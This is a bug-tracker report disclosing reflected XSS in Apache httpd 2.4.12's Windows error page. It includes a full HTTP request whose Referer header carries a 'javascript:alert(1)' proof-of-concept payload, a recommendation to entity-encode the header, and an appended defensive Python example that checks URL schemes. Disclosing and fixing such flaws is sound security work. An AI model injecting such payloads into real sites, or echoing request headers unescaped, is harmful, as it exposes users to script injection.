https://bz.apache.org/bugzilla/show_bug.cgi?id=58226
Bug ID: 58226
Summary: XSS in Error Page
Product: Apache httpd-2
Version: 2.4.12
Hardware: PC
Status: NEW
Severity: normal
Priority: P2
Component: Win32 MSI Installer
Assignee: [email protected]
Reporter: [email protected]
Created attachment 32983
--> https://bz.apache.org/bugzilla/attachment.cgi?id=32983&action=edit
Hover over the link and see the payload
Setup Details : Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.6.11
Request to server:
GET /not_existing_link HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: javascript:alert(1)//452bce05
Cookie: _ga=GA1.1.1225409471.1439004440; _gat=1
Connection: keep-alive
When we send the above request to the server, the script in the referer header
(Referer: javascript:alert(1)//452bce05) gets embedded in the error page.
This gets executed when the user clicks on the link. (Image attached)
The same can be used for SELF XSS.
Recommendation: Convert respective characters from the referer header into
their HTML entities.
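An added example, not part of the original report and not httpd's own code: the Referer value in this report contains none of the characters that HTML entity encoding rewrites, so an error page that places the header in a link's href needs a scheme check as well as escaping. The function name, the fallback text and the http/https allowlist are assumptions made for illustration.

```python
import html
from urllib.parse import urlsplit

# Assumption: only http and https referrers are ever rendered as a clickable link.
ALLOWED_SCHEMES = {"http", "https"}

# The Referer header value from the request in this report.
PAYLOAD = "javascript:alert(1)//452bce05"

FALLBACK = "the referring page"


def render_referer_link(referer):
    """Return the HTML fragment an error page would show for the Referer header."""
    if not referer:
        return FALLBACK
    # Browsers ignore tabs, newlines and leading whitespace inside a URL scheme,
    # so drop control characters and spaces before deciding what the scheme is.
    cleaned = "".join(ch for ch in referer if ch > " " and ch != "\x7f")
    try:
        parts = urlsplit(cleaned)
    except ValueError:
        return FALLBACK
    if parts.scheme not in ALLOWED_SCHEMES or not parts.netloc:
        # Not a web URL: show it as escaped text, never as an href.
        return FALLBACK + " (" + html.escape(referer, quote=True) + ")"
    # Web URL: still entity-encode it for the attribute context.
    return '<a href="' + html.escape(cleaned, quote=True) + '">referring page</a>'


if __name__ == "__main__":
    # Entity encoding alone leaves the reported value unchanged.
    print(html.escape(PAYLOAD, quote=True) == PAYLOAD)
    print(render_referer_link(PAYLOAD))
    print(render_referer_link('http://example.test/a?b=1&c="x"'))
```
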